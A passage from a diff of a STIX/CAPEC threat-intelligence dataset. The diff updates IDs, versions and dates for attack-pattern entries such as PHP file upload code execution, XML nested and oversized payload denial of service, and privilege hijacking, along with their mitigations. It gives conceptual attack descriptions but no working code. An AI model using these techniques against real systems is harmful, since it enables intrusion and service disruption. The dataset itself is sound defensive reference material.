"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -13152,120 +13289,121 @@ "\n PHP is a very popular language used for developing web applications. When PHP is used with global variables, a vulnerability may be opened that affects the file system. A standard HTML form that allows for remote users to upload files, may also place those files in a public directory where the adversary can directly access and execute them through a browser. This vulnerability allows remote adversaries to execute arbitrary code on the system, and can result in the adversary being able to erase intrusion evidence from system and application logs.\n [R.23.2]\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "id": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9367b9cc-36b3-4c01-b42d-eb89c23f2c54", - "source_ref": "course-of-action--7f305fb8-6ba6-4a96-bd8e-57597fb62d8c", + "id": "relationship--9e2c3cb9-45cc-41c4-9a87-250c23bc1ba1", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-23-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Validate all input for content including files. Ensure that if files and remote content must be accepted that once accepted, they are placed in a sandbox type location so that lower assurance clients cannot write up to higher assurance processes (like Web server processes for example)", "type": "course-of-action", - "id": "course-of-action--c0aa1c34-8a13-414d-b86e-546f5e77dd57" + "id": "course-of-action--d23ad838-17c7-483f-9c9e-409581bff898" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ff1627cb-cd5f-412f-bee9-ee1cd5a6cae4", - "source_ref": "course-of-action--c0aa1c34-8a13-414d-b86e-546f5e77dd57", + "id": "relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0", + "source_ref": "course-of-action--d23ad838-17c7-483f-9c9e-409581bff898", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ec20a5c6-4d11-4c84-9e89-95f86b3a3a8b", - "source_ref": "course-of-action--08f4e02a-825e-40af-9045-9c00f57141b8", + "id": "relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--955f7b7d-5029-4709-8dd7-296817ab2c3c", - "source_ref": "course-of-action--50263c48-f3f5-4eca-b2b3-24bd8021be9d", + "id": "relationship--aacfa64c-2007-4b20-a791-3207866e0565", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-23-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Virus scanning on host", "type": "course-of-action", - "id": "course-of-action--e5adcdcb-0053-4b94-a944-2520434c6387" + "id": "course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--f3aaad1f-d7d6-4a3b-9d82-e11d10c708b4", - "source_ref": "course-of-action--e5adcdcb-0053-4b94-a944-2520434c6387", + "id": "relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2", + "source_ref": "course-of-action--b6e32f66-ed14-40e2-90b7-ac4b07e8b60f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a40188ca-1e03-4199-bf11-cfa411515533", - "source_ref": "course-of-action--f1521ff8-975a-4136-845c-402ee9caf052", + "id": "relationship--103ed571-70dd-468a-8af7-d63da596f200", + "source_ref": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9fdb7c92-77f5-4c21-aaaa-069dad83b834" + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69" }, { "name": "XML Nested Payloads", "description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By nesting XML data and causing this data to be continuously self-referential, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization. An adversary's goal is to leverage parser failure to his or her advantage. In most cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it may be possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.230.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -13304,7 +13442,9 @@ "external_id": "REF-89" } ], - "x_capec_alternate_terms": [], + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], "x_capec_likelihood_of_attack": "Medium", "x_capec_typical_severity": "High", "x_capec_prerequisites": [ @@ -13337,118 +13477,119 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7a80a201-8ed8-4a0d-b2ee-ad2604afb41a" + "id": "attack-pattern--e372df87-d117-476a-907d-0372310c2414" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-230-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Carefully validate and sanitize all user-controllable data prior to passing it to the XML parser routine. Ensure that the resultant data is safe to pass to the XML parser.", "type": "course-of-action", - "id": "course-of-action--76ad124f-5292-4f16-a214-6d1ef536710d" + "id": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0f9254bd-6a5f-422b-8ea5-578857b8c855", - "source_ref": "course-of-action--76ad124f-5292-4f16-a214-6d1ef536710d", + "id": "relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d", + "source_ref": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7a80a201-8ed8-4a0d-b2ee-ad2604afb41a" + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-230-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Perform validation on canonical data.", "type": "course-of-action", - "id": "course-of-action--359a4ffb-4bb3-4ee1-b1ef-acb19ff0df8f" + "id": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aff96271-6e31-47fc-b96c-ac46eac95873", - "source_ref": "course-of-action--359a4ffb-4bb3-4ee1-b1ef-acb19ff0df8f", + "id": "relationship--278293b6-4f1f-4025-9511-c9b8f4339668", + "source_ref": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7a80a201-8ed8-4a0d-b2ee-ad2604afb41a" + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-230-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Pick a robust implementation of an XML parser.", "type": "course-of-action", - "id": "course-of-action--5180931d-4117-43cc-9533-74901a392e91" + "id": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b7fb28cd-071d-4a5d-9494-07789501f68e", - "source_ref": "course-of-action--5180931d-4117-43cc-9533-74901a392e91", + "id": "relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5", + "source_ref": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7a80a201-8ed8-4a0d-b2ee-ad2604afb41a" + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-230-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Validate XML against a valid schema or DTD prior to parsing.", "type": "course-of-action", - "id": "course-of-action--2808ba6f-2b7d-4c6f-923e-9d9ed123e186" + "id": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2459ec36-2da1-4577-85f1-a6772b2ce648", - "source_ref": "course-of-action--2808ba6f-2b7d-4c6f-923e-9d9ed123e186", + "id": "relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d", + "source_ref": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--7a80a201-8ed8-4a0d-b2ee-ad2604afb41a" + "target_ref": "attack-pattern--e372df87-d117-476a-907d-0372310c2414" }, { "name": "XML Oversized Payloads", "description": "Applications often need to transform data in and out of the XML format by using an XML parser. It may be possible for an adversary to inject data that may have an adverse effect on the XML parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the XML parser, an adversary can cause the XML parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to his or her advantage. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [R.231.1]. XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -13487,7 +13628,9 @@ "external_id": "REF-89" } ], - "x_capec_alternate_terms": [], + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], "x_capec_likelihood_of_attack": "Medium", "x_capec_typical_severity": "High", "x_capec_prerequisites": [ @@ -13520,67 +13663,68 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--6d01cfad-2077-4a11-9218-63a48bf94be5" + "id": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--768e9a8a-9d2b-42b8-a3a0-25251543dce9", - "source_ref": "course-of-action--76ad124f-5292-4f16-a214-6d1ef536710d", + "id": "relationship--eb359e19-953c-4676-b70c-7988d4e41952", + "source_ref": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6d01cfad-2077-4a11-9218-63a48bf94be5" + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d29b0210-904d-45c7-b6e6-c52059a1dc92", - "source_ref": "course-of-action--359a4ffb-4bb3-4ee1-b1ef-acb19ff0df8f", + "id": "relationship--cccb0e32-4f31-47b9-97ac-316107163645", + "source_ref": "course-of-action--e321100c-7fd0-4dde-8013-7e3871aea671", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6d01cfad-2077-4a11-9218-63a48bf94be5" + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--20e6b341-febd-4759-a737-fd4a5b214391", - "source_ref": "course-of-action--5180931d-4117-43cc-9533-74901a392e91", + "id": "relationship--14d99e66-93e6-481c-ad94-22819118abe4", + "source_ref": "course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6d01cfad-2077-4a11-9218-63a48bf94be5" + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", - "modified": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d69c22e6-3501-4c6a-ab82-738c43698940", - "source_ref": "course-of-action--2808ba6f-2b7d-4c6f-923e-9d9ed123e186", + "id": "relationship--b2123192-f6e4-4402-b8aa-3256e75fb07c", + "source_ref": "course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--6d01cfad-2077-4a11-9218-63a48bf94be5" + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1" }, { "name": "Privilege Escalation", "description": "An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -13598,15 +13742,16 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5f76fc35-8161-4e8e-8f83-d7cb6248dd98" + "id": "attack-pattern--36fba29d-f16f-4cf7-8324-118086f0fb5f" }, { "name": "Hijacking a privileged process", "description": "An attacker gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code. Processes can be hijacked through improper handling of user input (for example, a buffer overflow or certain types of injection attacks) or by utilizing system utilities that support process control that have been inadequately secured.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -13636,15 +13781,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--929b024a-4ae1-468c-b00c-7be41ac46111" + "id": "attack-pattern--f7a4894c-1535-4ab0-8b9f-2f146b3c97f3" }, { "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)", "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -13657,15 +13803,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--5f81ed84-616f-430f-a96a-4cdb5e45594d" + "id": "attack-pattern--18d613ca-3840-4fb8-b628-e12a8b1fe2d4" }, { "name": "Catching exception throw/signal from privileged block", "description": "Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -13718,68 +13865,69 @@ "Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ecf4a84d-1c1a-4f51-9613-f6cd4654f521" + "id": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-236-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.", "type": "course-of-action", - "id": "course-of-action--4fe1fb02-103f-4ae0-8405-475094c9c877" + "id": "course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d8ca7534-b173-417d-bd67-b43bd46eb02f", - "source_ref": "course-of-action--4fe1fb02-103f-4ae0-8405-475094c9c877", + "id": "relationship--cf0f24ae-b5cd-4c07-bda1-953830cf32e1", + "source_ref": "course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ecf4a84d-1c1a-4f51-9613-f6cd4654f521" + "target_ref": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-236-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope.", "type": "course-of-action", - "id": "course-of-action--4fc40a40-b8e3-4d3b-a313-b5439e664d5d" + "id": "course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5ed6c78d-90ed-46eb-acf3-508402fdd7ee", - "source_ref": "course-of-action--4fc40a40-b8e3-4d3b-a313-b5439e664d5d", + "id": "relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc", + "source_ref": "course-of-action--956aa2c3-9dd3-49db-bade-4934248c6555", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ecf4a84d-1c1a-4f51-9613-f6cd4654f521" + "target_ref": "attack-pattern--3a406c19-8e0f-4b7b-a0ef-c97bd157dca0" }, { "name": "Escaping a Sandbox by Calling Signed Code in Another Language", "description": "The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java 